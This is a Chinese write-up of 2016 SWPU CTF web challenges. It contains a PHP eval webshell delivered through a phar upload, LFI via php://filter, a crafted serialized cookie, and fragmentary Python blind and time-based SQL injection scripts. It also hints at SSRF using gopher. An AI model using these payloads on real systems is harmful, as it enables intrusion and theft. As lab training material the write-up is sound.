2016 SWPU 自己做出题目的思路分享

mysql> select 1 from dual where 1=1=1=(select '');
Empty set (0.16 sec)

mysql> select 1 from dual where 1=1=1=(select '1');
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)

mysql> select 1 from dual where 1=1=1=(select 0);
Empty set (0.19 sec)

mysql> select 1 from dual where 1=1=1=(select 1);
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)


mysql> select substring('admin' from 5) from dual;
+---------------------------+
+---------------------------+
| n                         |
+---------------------------+
1 row in set (0.00 sec)

mysql> select substring('admin' from 4) from dual;
+---------------------------+
+---------------------------+
| in                        |
+---------------------------+
1 row in set (0.00 sec)

mysql> select substring('admin' from 3) from dual;
+---------------------------+
+---------------------------+
| min                       |
+---------------------------+
1 row in set (0.00 sec)

mysql> select substring('admin' from 2) from dual;
+---------------------------+
+---------------------------+
| dmin                      |
+---------------------------+
1 row in set (0.00 sec)



__author__ = 'niexinming'
import urllib2
# NOTE(review): Python 2 listing (print statement, urllib2). The indentation
# was lost in extraction, so the nesting below has to be read from context.
# Candidate character set: lowercase letters and digits.
data="abcdefghijklmnopqrstuvwxyz1234567890"
# Recovered value; characters are prepended (xx=ii+xx), so it grows from
# the right-hand end towards the left.
xx=""
# Set to 1 on a hit and reset to 0 otherwise; never read in this listing.
flag=0
listdata=list(data)
# Positions are walked from 32 down to 0 (right to left), which matches the
# substring('...' from N) suffix probes in the MySQL transcript above.
for jj in range(0,33)[::-1]:
#print jj
for ii in listdata:
#print post_data
# NOTE(review): the request and the comparison that decide whether `ii`
# is the right character are missing from this listing — post_data is
# never defined and the break below is unconditional as shown. Treat the
# snippet as a fragment rather than a runnable script.
flag=1
xx=ii+xx
print xx
break
# for/else: runs only when the inner loop finishes without a break.
else:
flag=0

unzip${IFS}2.zip 然后在网站的admin目录下就有一个2.php，地址： http://web1.08067.me/admin/2.php 然后拿到flag ------------------------------------------------------------------------------------------web2------------------------------------------------------------------------------------------------------------------------- web2 http://web2.08067.me: 首先这个题目给出一个提示:里面有个include.php 打开http://web2.08067.me/include.php，查看源码发现又一个提示：<!-- upload.php --> 发现有上传的地方，但是上传的地方只能上传图片文件，因为有个include.php有个任意包含漏洞，可以利用lfi读取upload.php和include.php的源码 读取源代码的方法： http://web2.08067.me/include.php?file=php://filter/convert.base64-encode/resource=upload 把upload.php的源码以base64的方式返回回来，解码之后： <form action="" enctype="multipart/form-data" method="post" name="upload">file:<input type="file" name="file" /><br> <input type="submit" value="upload" /></form> <?php if(!empty($_FILES["file"]))
{
// upload.php, recovered via php://filter as described above; the enclosing
// if(!empty($_FILES["file"])) is on the previous line.
// NOTE(review): $_FILE (singular) is not a PHP superglobal — presumably a
// typo for $_FILES; as written it is an undefined variable and prints nothing.
echo $_FILE["file"];$allowedExts = array("gif", "jpeg", "jpg", "png");
// "Extension" = the text after the last '.' of the client-supplied file name.
@$temp = explode(".",$_FILES["file"]["name"]);
$extension = end($temp);
// Every check here reads client-controlled data: the MIME type is whatever
// the client declared, the size is capped at 100 KiB (102400 bytes) and only
// the name's extension is matched against the whitelist. The content itself
// is never inspected (getimagesize()/finfo would be the server-side check),
// and the file is stored under upload/ with its original name.
if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
|| (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
|| (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
&& (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts)) { move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]); echo "file upload successful!Save in: " . "upload/" .$_FILES["file"]["name"];
}
else
// A rejected upload produces no output at all.
{
}
}


http://web2.08067.me/include.php?file=php://filter/convert.base64-encode/resource=include

<html>
Tips: the parameter is file! :)
</html>
<?php
// include.php, recovered via php://filter (see above). The only input is ?file=.
@$file =$_GET["file"];
// Blacklist rather than whitelist: rejects the substrings http/data/ftp/input/%00
// (case-insensitive), any "..", and values of 70 or more characters. Anything
// else has ".php" appended and is passed to include() unchanged, so stream
// wrappers that are not on the list are not filtered at all. A whitelist of
// page names resolved server-side would avoid the wrapper problem entirely.
if(isset($file)) { if (preg_match('/http|data|ftp|input|%00/i',$file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
{
echo "<p> error! </p>";
}
else
{
include($file.'.php'); } } ?>  发现每一个地方都被限制死死的，包含的地方不能截断而且包含的文件只能是.php结尾的，上传的文件只能是图片文件 看来只有一种办法了，参考http://www.php.net/manual/zh/wrappers.phar.php 能用到phar:// 这个协议了 如何创建一个phar文件呢？ 方法一： 参考：https://segmentfault.com/a/1190000002166235 http://www.mamicode.com/info-detail-888559.html 现在我来创建自己的php的打包文件phar 首先在创建一个目录，名字是1 然后在1那个目录底下创建一个index.php内容是： <?php @eval($_POST['c']);?>

<?php
// Packs every *.php under ./1 into my.phar with gzip-compressed entries;
// the stopBuffering()/setStub() calls continue on the next line.
$phar = new Phar('my.phar');$phar->buildFromDirectory(__DIR__.'/1', '/.php$/');$phar->compressFiles(Phar::GZ);
$phar->stopBuffering();$phar->setStub($phar->createDefaultStub('index.php')); 然后在shell中执行在1目录外面生成一个叫my.phar的打包文件 把my.phar改成my.jpg上传，然后访问： http://web2.08067.me/include.php?file=phar://upload/heheda.jpg/index 这样一句话木马就可以执行了 方法二： 直接把一个一句话木马的php文件压缩成zip格式，然后把文件后缀改成jpg，然后上传，以同样的方式访问也能执行木马 不知道为什么用菜刀连接不到，我自己用php代码来读一下目录下有什么文件吧： 下面是php一句话读取目录： $dh=opendir("./");while (($file = readdir($dh)) !== false){echo $file."<br>";} 然后发现flag文件在swpu_wbe2_tips.txt 直接访问：http://web2.08067.me/swpu_wbe2_tips.txt 就可以得到flag和下一个题目的提示 --------------------------------------------------------------------------------------------------------web3----------------------------------------------------------------------------------------------------------- http://web3.08067.me/wakeup/index.php 官方给了提示： .bak泄露,index.php.bak,function.php.bak 首先看index.php.bak的源码： if(isset($_COOKIE['user'])){
// index.php.bak (continues the if(isset($_COOKIE['user'])) on the line above):
// the `user` cookie is base64-decoded and handed straight to unserialize()
// with errors suppressed, so the object — including the login class below,
// which defines __wakeup and __destruct — is built from client input. A
// defender would keep this state server-side, or use a signed token / JSON,
// rather than unserialize() a cookie.
$login = @unserialize(base64_decode($_COOKIE['user']));
// Only a non-empty ->pass triggers check_login(); a return value of 1 marks
// the session as logged in.
if(!empty($login->pass)){$status = $login->check_login(); if($status == 1){
$_SESSION['login'] = 1; var_dump("login by cookie!!!"); } } }  看function.php.bak class help { static function addslashes_deep($value)
// help::addslashes_deep — recurses into arrays; with magic quotes off each
// scalar is addslashes()'d first, then mystrip_tags() is applied either way.
// Empty values (empty() semantics, so "0" included) are returned untouched.
{
if (empty($value)) { return$value;
}
else
{
if (!get_magic_quotes_gpc())
{
$value=is_array($value) ? array_map("help::addslashes_deep", $value) : help::mystrip_tags(addslashes($value));
}
else
{
$value=is_array($value) ? array_map("help::addslashes_deep", $value) : help::mystrip_tags($value);
}
return $value; } } static function remove_xss($string) {
// help::remove_xss — drops C0/DEL control characters, then for each keyword
// in $parm1 (tag names / URL schemes), $parm2 (event handlers and URL-bearing
// attributes) and $parm3 (SQL and JS function names) builds a case-insensitive
// pattern that tolerates an optional entity-encoded filler between letters and
// replaces every match with '****'. There are no word boundaries, so ordinary
// words that merely contain a keyword (e.g. "or", "and") are mangled too.
$string = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '',$string);

$parm1 = Array('javascript', 'union','vbscript', 'expression', 'applet', 'xml', 'blink', 'link', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'base');$parm2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload','href','action','location','background','src','poster');

$parm3 = Array('alert','sleep','load_file','confirm','prompt','benchmark','select','and','or','xor','update','insert','delete','alter','drop','truncate','script','eval','outfile','dumpfile');$parm = array_merge($parm1,$parm2, $parm3); for ($i = 0; $i < sizeof($parm); $i++) {$pattern = '/';
for ($j = 0;$j < strlen($parm[$i]); $j++) { if ($j > 0) {
$pattern .= '(';$pattern .= '(&#[x|X]0([9][a][b]);?)?';
// NOTE(review): the U+FFFD on the next line is an extraction artifact;
// presumably the original read '&#' here (the decimal-entity counterpart of
// the hex-entity alternative above) — confirm against the .bak file.
$pattern .= '|(�([9][10][13]);?)?';$pattern .= ')?';
}
$pattern .=$parm[$i][$j];
}
$pattern .= '/i';$string = preg_replace($pattern, '****',$string);
}
return $string; } static function mystrip_tags($string)
// help::mystrip_tags — entity replacement followed by remove_xss().
{
$string = help::new_html_special_chars($string);
$string = help::remove_xss($string);
return $string; } static function new_html_special_chars($string) {
// help::new_html_special_chars — NOTE(review): as rendered here the first four
// search/replace pairs are identical (& -> &, " -> ", ...), so only '&#' -> '***'
// has any visible effect; the replacement array presumably held HTML entities
// (&amp; etc.) that were decoded when the page was extracted — confirm.
$string = str_replace(array('&', '"', '<', '>','&#'), array('&', '"', '<', '>','***'),$string);
return $string; } // entity output static function htmlspecialchars_($value)
// help::htmlspecialchars_ — recursive htmlspecialchars() over arrays and
// scalars; empty values are returned unchanged. (As rendered above, the
// `static function` header sits inside the `//` comment.)
{
if (empty($value)) { return$value;
}
else
{
if(is_array($value)){ foreach ($value as $k =>$v) {
$value[$k] = self::htmlspecialchars_($v); } }else{$value = htmlspecialchars($value); } return$value;
}
}
//sql filter
// help::CheckSql — gate applied to an already-built SQL string before it is
// executed. Returns the string untouched on success; otherwise exit()s with
// "Error" plus a short reason. Not a substitute for parameterised queries.
static function CheckSql($db_string,$querytype='select')
{
$clean = '';$error='';
$old_pos = 0;$pos = -1;
// For selects, load_file/outfile preceded and followed by at least one
// character outside [0-9a-z@._-] is fatal before any further inspection.
if($querytype=='select') {$notallow1 = "[^0-9a-z@\._-]{1,}(load_file|outfile)[^0-9a-z@\.-]{1,}";
if(preg_match("/".$notallow1."/i",$db_string))
{
exit("Error");
}
}
//full SQL check
// Build $clean: the query with the contents of every single-quoted string
// replaced by the marker $s$. The inner loop steps past backslash-escaped
// characters to find the real closing quote. Only $clean is inspected below.
while (TRUE)
{
$pos = strpos($db_string, '\'', $pos + 1); if ($pos === FALSE)
{
break;
}
$clean .= substr($db_string, $old_pos,$pos - $old_pos); while (TRUE) {$pos1 = strpos($db_string, '\'',$pos + 1);
$pos2 = strpos($db_string, '\\', $pos + 1); if ($pos1 === FALSE)
{
break;
}
elseif ($pos2 == FALSE ||$pos2 > $pos1) {$pos = $pos1; break; }$pos = $pos2 + 1; }$clean .= '$s$';
$old_pos =$pos + 1;
}
// Whitespace-collapsed, lower-cased $clean is then checked in order: unusual
// characters (@, char(, a double quote, the literal $ss$) — waived for a
// query starting with CREATE TABLE; comment markers; sleep(); benchmark();
// load_file(); INTO OUTFILE. $fail stays unset on the success path.
$clean .= substr($db_string, $old_pos);$clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean))); if (strpos($clean, '@') !== FALSE  OR strpos($clean,'char(')!== FALSE OR strpos($clean,'"')!== FALSE
OR strpos($clean,'$ss$')!== FALSE) {$fail = TRUE;
if(preg_match("#^create table#i",$clean))$fail = FALSE;
$error="unusual character"; } elseif (strpos($clean, '/*') !== FALSE ||strpos($clean, '-- ') !== FALSE || strpos($clean, '#') !== FALSE)
{
$fail = TRUE;$error="comment detect";
}
elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~is', $clean) != 0) {$fail = TRUE;
$error="slown down detect"; } elseif (strpos($clean, 'benchmark') !== FALSE && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~is',$clean) != 0)
{
$fail = TRUE;$error="slown down detect";
}
elseif (strpos($clean, 'load_file') !== FALSE && preg_match('~(^|[^a-z])load_file($|[^[a-z])~is', $clean) != 0) {$fail = TRUE;
$error="file fun detect"; } elseif (strpos($clean, 'into outfile') !== FALSE && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~is',$clean) != 0)
{
$fail = TRUE;$error="file fun detect";
}
if (!empty($fail)) { exit("Error" .$error);
}
else
{
return $db_string; } } } class login{ var$uid = 0;
var $name=''; var$pass='';
// class login — three public properties (uid, name, pass), all populated by
// the unserialize() call at the top of this listing.

//check whether the user is logged in
// NOTE(review): the method header is missing from this listing; given the
// check_login() calls above and in __destruct below, this is presumably
// `public function check_login(){`. The user name is interpolated into the
// query inside single quotes, and help::CheckSql() is the only step between
// that string and mysql_query() (legacy ext/mysql).
mysql_conn();
$sqls = "select * from phpinfoadmin where username='$this->name'";
$sqls = help::CheckSql($sqls);
$re = mysql_query($sqls);
$results = @mysql_fetch_array($re);
//echo $sqls .$results['passwd'];
mysql_close();
// Returns 1 when the stored passwd loosely (==) equals ->pass, 0 on mismatch,
// and falls through (NULL) when no row came back.
if (!empty($results)) { if($results['passwd'] == $this->pass) { return 1; } else { return 0; } } } //guard against some cookie corruption causing login failure public function __destruct(){$this->check_login();
}
//validate data on unserialize
// __wakeup — name and pass are sanitised here with help::addslashes_deep
// (slashes plus entity/keyword stripping) rather than at the query site.
public function __wakeup(){
$this->name = help::addslashes_deep($this->name);
$this->pass = help::addslashes_deep($this->pass);
}
}
?>


O:5:"login":4:{s:3:"uid";i:0;s:4:"name";s:6:"heheda";s:4:"pass";s:32:"00af6f190235a168c57be5cff86668b0";}

select count(*) from information_schema.columns, information_schema.columns T1,information_schema.columns T2

__author__ = 'niexinming'
import base64
import urllib
import urllib2
import base64
import time
#ll=list("abcdefghijklmnopqrstuvwxyz1234567890")
#llascii=[]
#for jj in ll:
#    llascii.append(ord(jj))
# NOTE(review): Python 2 listing (print statement, urllib2); indentation was
# lost in extraction. Outer loop = character position 1..31, inner loop =
# candidate byte value; a hit is decided purely by response time (see below).
for kk in range(1,32):
print "di : "+str(kk)
# Candidates cover the printable ASCII range 32..126.
for i in range(32,127):
start= time.time()
url="http://web3.08067.me/wakeup/index.php"
sql="select flag from flag"
# The comparison is AND-ed with the deliberately heavy triple self-join of
# information_schema.columns quoted above the script, so a true comparison
# presumably takes far longer to answer than a false one. From the server
# side this shows up as a burst of requests each taking several seconds.
payload="admin'and ascii(substring((%s),%s,1))=%s and (select count(*) from information_schema.columns, information_schema.columns T1,information_schema.columns T2)=1 and '1'='1" % (sql,str(kk),str(i))
#print xueliehua
# NOTE(review): `xueliehua` (序列化, "serialized") and `r` are never defined in
# this listing — presumably the serialized object and the prepared request,
# lost in extraction; `url` and `payload` are otherwise unused in the
# visible lines, and `resual` is never read. Treat as a fragment.
b64=base64.b64encode(xueliehua)
urlencodedata=urllib.quote(b64)
#print urlencodedata
resual= urllib2.urlopen(r)
end= time.time()
#print str(end-start)+":",
#print chr(i)
# Timing oracle: an elapsed time between 8 and 20 seconds is taken as a
# match; the upper bound presumably filters out timeouts and stalls.
if 20>(end-start)>8:
print "this this:"+str(kk)+" : "+chr(i)
break



--------------------------------------------------------------------------------------------------------web5-----------------------------------------------------------------------------------------------------------

http://web5.08067.me/

ssrf,关注下其他的协议,flag不在本机

DEVICE=eth0
TYPE=Ethernet
UUID=a1ca5d0e-61c9-4693-82ee-437eb0331617
ONBOOT=yes
NM_CONTROLLED=yes
BOOTPROTO=static
GATEWAY=172.16.181.2
DNS1=114.114.114.114
DNS2=172.16.181.2

gopher协议，百度百科有对这个协议的介绍：

error names

# -*- coding: utf-8 -*-

import re
import os
import requests
import time
import urllib
# NOTE(review): Python 2 listing (print statement); indentation was lost in
# extraction and the request-building and response-comparison lines are
# missing — `length` and `url` are never defined here and the break below is
# unconditional as shown. Treat as a fragment.
for x in range(1,40):
print "di:"+str(x)
for i in range(32,127):
# `content_len` (length + 23) is computed but not used in the visible lines;
# presumably a Content-Length for the request assembled into `url` (the
# surrounding text discusses SSRF via the gopher scheme) — confirm.
content_len=length+23
# print content_len
# print url

# Fetches `url` with the third-party requests library; `res` holds the body,
# but no check on it survives in this listing.
res=requests.get(url).text
print chr(i)
break

